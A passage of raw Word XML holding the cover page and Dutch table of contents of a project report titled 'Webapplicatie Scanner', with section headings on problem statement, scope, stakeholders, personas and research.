                                    <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                    <w:spacing w:val="20"/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                    <w:lang w:val="en-GB"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:proofErr w:type="spellStart"/>
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                    <w:spacing w:val="20"/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                    <w:lang w:val="en-GB"/>
                                  </w:rPr>
                                  <w:t>Webapplicatie</w:t>
                                </w:r>
                                <w:proofErr w:type="spellEnd"/>
                                <w:r w:rsidRPr="00CB3E4B">
                                  <w:rPr>
                                    <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                    <w:spacing w:val="20"/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                    <w:lang w:val="en-GB"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> Scanner</w:t>
                                </w:r>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                          <w:p w14:paraId="7D293BDB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00CB3E4B" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                              <w:spacing w:line="264" w:lineRule="auto"/>
                              <w:rPr>
                                <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                <w:spacing w:val="20"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="43C19864" w14:textId="7500058C" w:rsidR="00CE4BB5" w:rsidRPr="00CB3E4B" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>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v:textbox>
                    </v:shape>
                    <v:shape id="Text Box 479" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:3095625;top:7305675;width:3904488;height:1504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P+2pxQAA&#10;ANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JAFITvBf/D8gRvdVOxalNXsYWWUE9JBK+P7DMJ&#10;zb4N2Y2J/74rCD0OM/MNs92PphFX6lxtWcHLPAJBXFhdc6nglH89b0A4j6yxsUwKbuRgv5s8bTHW&#10;duCUrpkvRYCwi1FB5X0bS+mKigy6uW2Jg3exnUEfZFdK3eEQ4KaRiyhaSYM1h4UKW/qsqPjNeqNg&#10;OOdpn5+zn/T4/drf5Cq5fAyJUrPpeHgH4Wn0/+FHO9EKlus3uJ8JR0D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A/7anFAAAA3AAAAA8AAAAAAAAAAAAAAAAAlwIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAw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CE4BB5" w:rsidRDefault="00CE4BB5">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:spacing w:after="180"/>
                                  <w:rPr>
                                    <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                    <w:spacing w:val="20"/>
                                    <w:sz w:val="36"/>
                                    <w:szCs w:val="36"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                    <w:spacing w:val="20"/>
                                    <w:sz w:val="36"/>
                                    <w:szCs w:val="36"/>
                                    <w:lang w:val="en-GB"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">Mohamed El </w:t>
                                </w:r>
                                <w:proofErr w:type="spellStart"/>
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                    <w:spacing w:val="20"/>
                                    <w:sz w:val="36"/>
                                    <w:szCs w:val="36"/>
                                    <w:lang w:val="en-GB"/>
                                  </w:rPr>
                                  <w:t>Kawakibi</w:t>
                                </w:r>
                                <w:proofErr w:type="spellEnd"/>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                          <w:p w14:paraId="34B3131C" w14:textId="40259746" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">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v:textbox>
                    </v:shape>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:group>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="3B53A699" w14:textId="1A6F2067" w:rsidR="00FE7456" w:rsidRDefault="00FE7456">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:id w:val="2133132357"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="429B57DD" w14:textId="464CF539" w:rsidR="004652B4" w:rsidRDefault="004652B4">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Inhoud</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6A9DE8DF" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="004652B4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc491022044" w:history="1">
            <w:r w:rsidR="00A27982" w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 Inleiding</w:t>
            </w:r>
            <w:r w:rsidR="00A27982">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A27982">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00A27982">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022044 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00A27982">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00A27982">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00A27982">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00A27982">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46FBA13C" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022045" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 aanleiding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022045 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E654CB2" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022046" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Probleemstelling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022046 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F3C1098" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022047" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Scope</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022047 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E557F72" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022048" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4 Onderzoek opzet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022048 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4107054A" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022049" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5 Project context</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022049 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4562CFA9" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022050" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Business Context</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022050 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AC54FD2" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022051" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Stakeholders en Business doelen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022051 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E942BCA" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022052" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1 Stakeholders</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022052 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1560D201" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022053" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2 Business Doelen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022053 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E654050" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022054" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Doelgroep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022054 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D610FA2" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022055" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1 Doelgroep onderzoek</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022055 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FA19A23" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022056" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>2.2.2Persona</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022056 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15A2F3DA" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022057" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 Onderzoek</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
